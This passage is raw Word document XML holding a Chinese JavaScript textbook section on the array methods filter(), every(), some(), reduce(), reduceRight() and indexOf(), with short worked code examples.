        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>everyother=a.filter(function(x,i){return i%2==0});//[5,3,1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>会跳过稀疏数组中缺少的元素，它的返回数组总是稠密的。为了压缩稀疏数组的空缺，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var dense=sparse.filter(function(){return true;});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>甚至，压缩空缺并删除</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>元素，可以这样使用</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">a=a.filter(function(x){return </w:t>
      </w:r>
      <w:r>
        <w:t>x!==undefined</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>x!=null;});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="184" w:name="7_9_4_every__He_some__"/>
      <w:r>
        <w:t>7.9.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>every()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>some()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="184"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>every()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>some()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是数组的逻辑判定：它们对数组元素应用指定的函数进行判定，返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>every()</w:t>
      </w:r>
      <w:r>
        <w:t>方法就像数学中的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>针对所有</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的量词：当且仅当针对数组中的所有元素调用判定函数都返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，它才返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=[1,2,3,4,5];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.every(function(x){return x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>10;})//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>所有的值＜</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.every(function(x)</w:t>
      </w:r>
      <w:r>
        <w:t>{return x%2===0;})//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>不是所有的值都是偶数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>some()</w:t>
      </w:r>
      <w:r>
        <w:t>方法就像数学中的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的量词：当数组中至少有一个元素调用判定函数返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，它就返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；并且当且仅当数值中的所有元素调用判定函数都返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，它才返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=[1,2,3,4,5];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.some(function(x){return x%2===0;})//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>含有偶数值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.some(isNaN)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>不包含非数值元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>注意，一旦</w:t>
      </w:r>
      <w:r>
        <w:t>every()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>some()</w:t>
      </w:r>
      <w:r>
        <w:t>确认该返回什么值它们就会停止遍历数组元素。</w:t>
      </w:r>
      <w:r>
        <w:t>some()</w:t>
      </w:r>
      <w:r>
        <w:t>在判定函数第一次返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>后就返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，但如果判定函数一直返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，它将会遍历整个数组。</w:t>
      </w:r>
      <w:r>
        <w:t>every()</w:t>
      </w:r>
      <w:r>
        <w:t>恰好相反：它在判定函数第一次返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>后就返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，但如果判定函数一直返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，它将会遍历整个数组。注意，根据数学上的惯例，在空数组上调用时，</w:t>
      </w:r>
      <w:r>
        <w:t>every()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>some()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="185" w:name="7_9_5_reduce__He_reduceRight__"/>
      <w:r>
        <w:t>7.9.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>reduceRight()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="185"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>reduceRight()</w:t>
      </w:r>
      <w:r>
        <w:t>方法使用指定的函数将数组元素</w:t>
      </w:r>
      <w:r>
        <w:t>进行组合，生成单个值。这在函数式编程中是常见的操作，也可以称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>注入</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>折叠</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。举例说明它是如何工作的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[1,2,3,4,5]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sum=a.reduce(function(x,y){return x+y},0);//</w:t>
      </w:r>
      <w:r>
        <w:t>数组求和</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var product=a.reduce(function(x,y){return x*y},1);//</w:t>
      </w:r>
      <w:r>
        <w:t>数组求积</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var max=a.reduce(function(x,y){return(x</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>y)?x:y;});//</w:t>
      </w:r>
      <w:r>
        <w:t>求最大值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>需要两个参数。第一个是执行化简操作的函数。化简函数的任务就是用某种方法把两个值组合或化简为一个值，并返回化简后的值。在上述例子中，函数通过加法、乘法或取最大值的方法组合两个值。第二个（可选）的参数是一个传递给函数的初始值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>使用的函数与</w:t>
      </w:r>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>使用的函数不同。比较熟悉的是，数组元素、元素的索引和数组本身将作为第</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个参数传递给函数。第一个参数是到目前为止的化简操作累积的结果。第一次调用函数时，第一个参数是一个初始值，它就是传递给</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>的第二个</w:t>
      </w:r>
      <w:r>
        <w:t>参数。在接下来的调用中，这个值就是上一次化简函数的返回值。在上面的第一个例子中，第一次调用化简函数时的参数是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。将两者相加并返回</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。再次调用时的参数是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>，它返回</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>。然后它计算</w:t>
      </w:r>
      <w:r>
        <w:t>3+3=6</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>6+4=10</w:t>
      </w:r>
      <w:r>
        <w:t>，最后计算</w:t>
      </w:r>
      <w:r>
        <w:t>10+5=15</w:t>
      </w:r>
      <w:r>
        <w:t>。最后的值是</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>返回这个值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可能已经注意到了，上面第三次调用</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>时只有一个参数：没有指定初始值。当不指定初始值调用</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>时，它将使用数组的第一个元素作为其初始值。这意味着第一次调用化简函数就使用了第一个和第二个数组元素作为其第一个和第二个参</w:t>
      </w:r>
      <w:r>
        <w:t>数。在上面求和与求积的例子中，可以省略初始值参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在空数组上，不带初始值参数调用</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>将导致类型错误异常。如果调用它的时候只有一个值</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>数组只有一个元素并且没有指定初始值，或者有一个空数组并且指定一个初始值</w:t>
      </w:r>
      <w:r>
        <w:t>——reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>只是简单地返回那个值而不会调用化简函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>reduceRight()</w:t>
      </w:r>
      <w:r>
        <w:t>的工作原理和</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>一样，不同的是它按照数组索引从高到低（从右到左）处理数组，而不是从低到高。如果化简操作的优先顺序是从右到左，你可能想使用它，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>a=[2,3,4]//</w:t>
      </w:r>
      <w:r>
        <w:t>计算</w:t>
      </w:r>
      <w:r>
        <w:t>2^(3^4)</w:t>
      </w:r>
      <w:r>
        <w:t>。乘方操作的优先顺序是从右到左</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var big=a.reduceRight(function(accumulator,value){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Math.pow(value,accumulator);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w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>reduceRight()</w:t>
      </w:r>
      <w:r>
        <w:t>都能接收一个可选的参数，它指定了化简函数调用时的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字的值。可选的初始值参数仍然需要占一个位置。如果想让化简函数作为一个特殊对象的方法调用，请参看</w:t>
      </w:r>
      <w:r>
        <w:t>Function.bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>值得注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>上面描述的</w:t>
      </w:r>
      <w:r>
        <w:t>every()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>some()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是一种类型的数组化简操作。但是不同的是，它们会尽早终止遍历而不总是访问每一个数组元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了简单起见，到目前位置所展示的例子都是数值的，但数学计算不是</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>reduceRight()</w:t>
      </w:r>
      <w:r>
        <w:t>的唯一意图。考虑一下例</w:t>
      </w:r>
      <w:r>
        <w:t>6-2</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>union()</w:t>
      </w:r>
      <w:r>
        <w:t>函数。它计算两个对象的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>并集</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，并返回另一个新对象，新对象具有二者的属性。该函数期待两个对象并返回另一个对</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>象，所以它的工作原理和一个化简函数一样，并且可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>来把它一般化，计算任意数目的对象的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>并集</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>objects=[{x:1},{y:2},{z:3}];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var merged=objects.reduce(union);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>{x:1,y:2,z:3}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>回想一下，当两个对象拥有同名的属性时，</w:t>
      </w:r>
      <w:r>
        <w:t>union()</w:t>
      </w:r>
      <w:r>
        <w:t>函数使用第一个参数的属性值。这样，</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>reduceRight()</w:t>
      </w:r>
      <w:r>
        <w:t>在使用</w:t>
      </w:r>
      <w:r>
        <w:t>union()</w:t>
      </w:r>
      <w:r>
        <w:t>时给出了不同的结果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var objects=[{x:1,a:1},{y:2,a:2},{z:3,a:3}];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var leftunion=objects.reduce(union);//{x:1,</w:t>
      </w:r>
      <w:r>
        <w:t>y:2,z:3,a:1}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var rightunion=objects.reduceRight(union);//{x:1,y:2,z:3,a:3}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="186" w:name="7_9_6_indexOf__He_lastIndexOf__"/>
      <w:r>
        <w:t>7.9.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndexOf()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="186"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>搜索整个数组中具有给定值的元素，返回找到的第一个元素的索引或者如果没有找到就返回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>从头至尾搜索，而</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>则反向搜索。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=[0,1,2,1,0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.indexOf(1)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
